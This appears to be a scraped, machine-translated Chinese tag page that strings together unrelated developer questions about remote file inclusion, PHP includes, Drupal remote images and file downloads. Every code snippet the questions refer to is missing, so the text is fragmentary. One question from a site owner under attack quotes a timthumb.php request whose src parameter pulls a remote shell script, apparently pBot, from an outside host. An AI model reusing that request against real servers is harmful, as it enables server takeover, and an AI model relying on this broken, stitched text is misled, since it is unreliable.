问题标签 [remote-file-inclusion]

最近我看到一篇关于使用 PHP 脚本重定向附属链接的博客文章。这让我开始思考这个脚本是否安全。我听说使用 $_GET 变量会导致漏洞。

任何建议，将不胜感激。检查输入的字母数字和连字符（'-'）是否足以防止这种情况发生？

对于此脚本，其中的链接将采用以下形式：

http://www.somesite.com/amazon.php?asin=XXXXXXXXXX

或者

http://www.somesite.com/amazon.php?id=some-keyword

这是amazon.php：

一如既往的感谢！

这就是我现在拥有的驻留在同一台服务器上的文件并且它可以工作。

我打算在完成后将文件通过 FTP 传输到另一台服务器，但是有没有办法在远程服务器上执行此操作？即在远程服务器上创建一个文本文件并写入它？没有找到该用法的任何实例。在这种情况下如何使用 ServerXMLHTTP 替换 Server.MapPath？

非常感谢您的参与。

I use the Remote File module for a cck field displaying a remote image. It works with a known issue: images are reloaded on every edit http://drupal.org/node/395256

And as i do tests with lots of nodes and delete them afterwards, the images cached in filesystem become deleted too. Is there a way to tell filefield(?) not to delete them?

edit

Meanwhile found http://drupal.org/project/filefield_sources which works very nice on manually created or edited nodes. But there is no way to make filefield fetch the image on assigning the url to the place where it shows up when i let print_r($node) show it to me.

See also my post to this (wont-fix)issue http://drupal.org/node/590756#comment-2774472

我们最近有一个网站被黑，其中一些 PHP 代码被注入到 index.php 文件中，看起来像这样：

该代码导致包含另一个 PHP 文件 (cnfg.php)，这导致显示一些与制药相关的垃圾邮件（但仅对 googlebot 等人可见）。这看起来像是 WordPress 的 pharma hack，除了我们没有运行 WordPress。该代码已被删除，但我想防止将来发生此类事件。

我意识到这是一个相当广泛的问题，可能存在无数安全漏洞，但我想我会把它放在那里，以防过去有人遇到过这样的问题。

允许上传这些 PHP 文件的潜在安全漏洞有哪些？我能做些什么来防止这种情况在未来发生？

我有问题。我有这个代码：

这将获取 url，例如：http://mywebsite.com/index.php?url=test

但是如果有人输入怎么办：

如何避免这种情况？我只想执行我服务器上的脚本，而不是来自其他网站的脚本。感谢帮助。

我正在尝试从我们的视频主机 Ooyala 下载视频源文件，但这些文件的文件名很长，没有描述性，并且没有扩展名。由于这些文件将被许多不同类型的人下载，我想解决这个问题，所以我使用以下代码设置标题并将文件读取到输出缓冲区：

我假设像这样的脚本将在整个下载过程中“运行”，所以我使用 ini_set 将“max_execution_time”设置为 7200，一切正常。所以现在我只是想知道我是否应该采取任何其他预防措施？也许是最大内存或什么？

谢谢！

我只是在头脑风暴一个界面，该界面根据页面目录中的文件动态生成页面。我想知道jquery是否可以做到这一点？例如，页面只显示每个文件的信息，可能是缩略图等。如果我将新文件放入该目录，页面将显示它。

我的服务器 (mediaquarter.at) 目前正被这样的请求 DDoSed（有一些小的变化）：hXXp://www.mediaquarter.at/http://www.madeineurope.org.uk/media/functions/timthumb/ timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php（网址“已停用”，因此不会有人意外点击它）

如果您尝试下载引用的 PHP 文件，请注意：在 preg_replace 中激活了 /e 开关，并且代码包含多个 eval 语句 - 在您想查看之前清理它！看起来像 pBot，你可以在这里找到更多信息：http ://www.offensivecomputing.net/?q=node/1417

TimThumb 容易受到远程文件包含的影响 (http://eromang.zataz.com/2011/09/20/wordpress-timthumb-rfi-vulnerability-used-as-botnet-recruitment-vector/) - 似乎在WordPress。所以我会理解有人调用 hXXp://www.madeineurope.org.uk/media/functions/timthumb/timthumb.php?src=http://blogger.com.midislandrental.com/.mods/sh.php 来利用漏洞。

但是，尝试通过另一个网站 (mediaquarter.at) 调用它有什么意义，只会导致 404 错误消息？此外，我的服务器没有运行 WordPress，而是使用 SilverStripe，所以这似乎毫无意义。

这只是攻击者一方的错误/愚蠢，还是我在这里忽略了某种攻击媒介？

PS：服务器只是一些廉价的虚拟主机，我根本无法访问它，所以我无法验证系统是否有任何变化。

我的问题是我不能在远程服务器上包含文件。

该脚本在 require_once 函数处失败。我正在运行脚本： php -d allow_url_include=On script.php 但要确保我已在 php.ini 中将 allow_url_include 和 allow_url_fopen 设置为 On

如果我将http://xx.xxx.xxx.xx:8080/path/to/myfile.inc 复制到浏览器，我将获得该文件。我还尝试包含其他远程文件（在标准端口 80 上），但仍然没有运气

我真正感到困惑的是，一切都可以在我办公室的本地计算机（mac、ubuntu）上运行，而不是从我们的服务器上运行。我已经在 2 个不同的服务器上测试了它，一个虚拟的和一个专用的。我可以使用 fopen() 获取文件。

我正在尝试使用 php 来读取单独的 php 文件的源代码。我正在尝试以下列方式使用 file_get_contents

不幸的是，上面的代码试图执行 php 代码，而不是像读取任何其他文件那样仅仅读取文本。

我遇到了一篇似乎可以解决该问题的文章，这使我得到了以下代码：

但是，此代码具有相同的效果；它尝试执行 php 代码。

如何在不尝试执行文件中的 php 的情况下使用 php 读取另一个 php 文件的源代码？